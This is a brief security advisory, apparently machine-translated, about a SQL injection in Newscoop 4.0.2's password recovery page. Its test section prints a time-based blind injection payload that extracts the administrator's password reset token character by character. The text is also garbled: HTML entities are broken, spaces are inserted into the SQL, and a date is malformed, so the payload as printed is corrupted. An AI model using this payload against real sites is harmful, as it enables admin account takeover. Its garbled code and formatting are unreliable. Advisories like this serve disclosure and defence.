Release date: 2012-4 4
Updated on: 2012-12-06
Affected Systems:
Sourcefabric Newscoop 4.0.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56800
Newscoop is a content management system.
Newscoop 4.0.2 and other versions have the SQL injection vulnerability. Attackers can exploit this vulnerability to operate databases illegally.
<* Source: Akastep
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Script:/admin/password_recovery.php
Payload: f_post_sent = 1 & amp; f_email = example@example.com & #39; and (select if (substr (password_reset_token, 15,1) = & #39; 1 & #39 ;, sleep (18000), 0) from liveuser_users where id = 1 limit 1) -- and 1! = & #39; @ sikdir and 9 = & #39; 9 & amp; Login = Recover + password
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourcefabric
------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Www.sourcefabric.org/en/newscoop/